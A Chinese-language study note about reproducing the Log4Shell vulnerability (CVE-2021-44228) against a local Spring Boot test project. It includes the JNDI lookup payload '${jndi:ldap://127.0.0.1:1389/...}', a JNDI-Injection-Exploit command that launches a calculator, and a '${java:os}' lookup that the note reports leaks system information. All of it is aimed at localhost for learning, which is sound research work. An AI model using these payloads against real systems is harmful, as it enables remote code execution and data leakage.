学习了一下最近曝出的log4j2漏洞(CVE-2021-44228),随便写个笔记,不求甚解。
参考资料:
https://itsc.nju.edu.cn/7a/42/c41947a555586/page.htm
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_8748923582296814965%22%7D&n_type=1&p_from=4
https://baijiahao.baidu.com/s?id=1718946520876495065&wfr=spider&for=pc
环境:
参考:
https://www.cnblogs.com/keeya/p/10101547.html
由于既存项目采用spring-boot默认的logback,复现漏洞需要引入log4j2的依赖:
原pom.xml:
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.0.3.RELEASE</version>
<relativePath />
</parent>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
修改后的pom.xml:
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<exclusions>
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-logging</artifactId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-log4j2</artifactId>
</dependency>
先说结论:
既存项目采用spring-boot默认的logback,虽然maven依赖有以下两个jar包,但并不受此次漏洞影响,经测试,log里能够输出"${jndi:ldap://127.0.0.1:1389/1qjuex}"字符串。
log4j-to-slf4j-2.10.0.jar
log4j-api-2.10.0.jar
浅显地了解了几种复现的方法,本文记录的是学习过程中,尝试过的几个方法。
1.marshalsec 可能需要搭ldap环境,而且class文件需要自己编译,遂放弃;
2.借用工具 JNDI-Injection-Exploit,抛异常,未能成功调出计算器,应该是官方有修复;
3.没用jndi注入,而是采用"${java:os}",成功。
实现过程:
1.marshalsec(未实现)
参考:
http://www.hackdig.com/12/hack-559266.htm
2.JNDI-Injection-Exploit(未实现)
执行下面第3步的时候后台报错,结果不完整,未能调出计算器。
参考:
https://www.cnblogs.com/Welk1n/p/11701401.html
https://github.com/welk1n/JNDI-Injection-Exploit
实现过程:
1)下载jar包
https://github.com/welk1n/JNDI-Injection-Exploit/releases
2)打开cmd,进入jar包所在目录,执行以下命令:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"
取得图中内容:
3)执行以下代码(后台报错)
public static void main(String[] args) throws Exception {
InitialContext ctx = new InitialContext();
ctx.lookup("ldap://127.0.0.1:1389/1qjuex");
}
4)在项目中添加以下处理,并通过浏览器向这个controller发请求
@RequestMapping("/log4jtest")
public String log4jtest() {
Logger logger = LogManager.getLogger(LogManager.ROOT_LOGGER_NAME);
logger.error("TEST: {}", "${jndi:ldap://127.0.0.1:1389/1qjuex}");
return "index";
}
同样抛异常,但看后台打印的log,没输出"${jndi:ldap://127.0.0.1:1389/1qjuex}"这个字符串,应该是识别了jndi的指令。
3.采用"${java:os}"
在项目中添加以下处理,并通过浏览器向这个controller发请求,log成功输出相关信息
@RequestMapping("/log4jtest")
public String log4jtest() {
Logger logger = LogManager.getLogger(LogManager.ROOT_LOGGER_NAME);
logger.error("TEST:{}", "${java:os}");
return "index";
}
参考:
https://blog.csdn.net/lumingzhu111/article/details/121871114